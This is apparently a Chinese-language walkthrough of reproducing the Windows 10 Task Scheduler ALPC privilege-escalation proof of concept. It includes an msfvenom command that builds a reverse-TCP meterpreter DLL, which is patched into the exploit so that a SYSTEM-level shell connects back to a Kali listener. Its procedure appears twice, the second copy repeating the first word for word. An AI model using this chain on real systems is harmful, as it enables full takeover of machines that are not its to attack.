win10中任务调度服务导出的函数没有验证调用者的权限,任意权限的用户调用该函数可以获取系统敏感文件的写权限,进而提权。影响范围:windows10,windows server 2016昨天群里的基友们都复现了一遍也都成功了,也有基友在windows8实验了发现了也能提权成功。
准备工作:下载POC,windows 10 镜像,Process Explorer,CFF
POC:GitHub - SandboxEscaper/randomrepo: Repo for random stuff
windows10 ISO:msdn下载
Process Explorer:Process Explorer - Windows Sysinternals | Microsoft Docs
CFF:Explorer Suite – NTCore
首先打开一个notepad
并没有什么不同,执行
带有子进程conhost和notepad的cmd.exe已经生成为SYSTEM!
在kali执行 msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f dll > ka.dll
移动到windows10
在CFF打开ALPC-TaskSched-LPE.dll替换其msf生成的dll,然后保存
kali中执行监听命令
windows 10中执行
返回kali可以发现已经成功的反弹了一个meterpreter,并且是system权限
准备工作:下载POC,windows 10 镜像,Process Explorer,CFF
POC:GitHub - SandboxEscaper/randomrepo: Repo for random stuff
windows10 ISO:msdn下载
Process Explorer:Process Explorer - Windows Sysinternals | Microsoft Docs
CFF:Explorer Suite – NTCore
首先打开一个notepad
并没有什么不同,执行
带有子进程conhost和notepad的cmd.exe已经生成为SYSTEM!
在kali执行 msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f dll > ka.dll
移动到windows10
在CFF打开ALPC-TaskSched-LPE.dll替换其msf生成的dll,然后保存
kali中执行监听命令
windows 10中执行
返回kali可以发现已经成功的反弹了一个meterpreter,并且是system权限
